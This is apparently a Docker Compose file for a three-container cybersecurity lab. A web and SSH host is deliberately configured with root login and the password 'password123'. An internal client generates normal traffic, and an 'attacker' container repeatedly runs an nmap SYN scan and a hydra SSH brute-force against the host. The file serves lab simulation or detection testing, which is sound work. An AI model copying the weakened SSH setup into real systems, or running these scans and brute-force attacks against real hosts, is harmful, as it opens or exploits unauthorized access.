services:
  hote_principal:
    image: ubuntu-reseau_image
    container_name: hote_principal
    networks:
      cybersec-net:
        ipv4_address: 20.0.0.2
    command: ["bash", "-c", "apt update && apt install -y nginx openssh-server && echo 'root:password123' | chpasswd && sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config && service ssh restart && nginx -g 'daemon off;'"]

  machine_interne:
    image: ubuntu-reseau_image
    container_name: machine_interne
    networks:
      cybersec-net:
        ipv4_address: 20.0.0.3
    command: ["bash", "-c", "apt update && apt install -y curl && while true; do curl http://hote_principal; sleep $((RANDOM%30+10)); done"]

  attaquant_externe:
    image: ubuntu-reseau_image
    container_name: attaquant_externe
    networks:   
      cybersec-net:
        ipv4_address: 20.0.0.4  
    volumes:
      - ./wordlists:/wordlists
    command: ["bash", "-c", "apt update && apt install -y nmap hydra hping3 && while true; do nmap -sS hote_principal; hydra -L /wordlists/users.txt -P /wordlists/passwords.txt hote_principal ssh; sleep 60; done"]

networks:
  cybersec-net:
    driver: bridge
    ipam:
      config:
        - subnet: 20.0.0.0/24  